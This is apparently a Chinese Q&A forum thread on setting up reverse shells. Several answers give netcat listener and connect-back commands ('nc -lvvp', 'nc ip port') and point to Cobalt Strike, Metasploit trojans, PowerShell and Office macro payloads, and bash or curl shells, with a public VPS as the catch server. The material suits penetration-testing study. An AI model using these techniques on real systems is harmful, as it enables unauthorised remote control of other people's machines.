反弹shell,控制端监听在某TCP/UDP端口,被控端发起请求到该端口,不需要知道被控端ip
9 个回答
用nc瑞士军刀啊
攻击机nc -lvvp 端口
靶机nc ip 端口
nc反弹,分很多种。
office宏反弹,powershell等,推荐使用Cobaltstike渗透神器,可以多种姿势,具体用方法可以百度
nc反弹,这是经常用的一种
看看是win还是linux,判断系统是否出网
linux自带nc,可以尝试反弹shell,你的本地ip不清楚情况下尝试使用正向shell进行连接
或者开一台公网vps进行反弹shell
win的话没有nc,可以上传nc,但建议直接cs或msf上线
linux机器的话可以考虑nc ,linux自带nc。正向连接去执行。
windows可以试试msf用正向的协议生成一个木马进行上线。
linux下nc反弹shell,本地监听便可
windows下nc也可以,但建议windows下cs或者msf直接上线便可,当然linux下也可以
Linux下可以利用bash反弹、curl反弹、whois反弹等等,不过linux自带了nc,我更喜欢用nc来搞;Windows下就没有自带nc了,需要上传个nc上去或者powercat类似nc,不过我最多的还是用msf和cs来做了。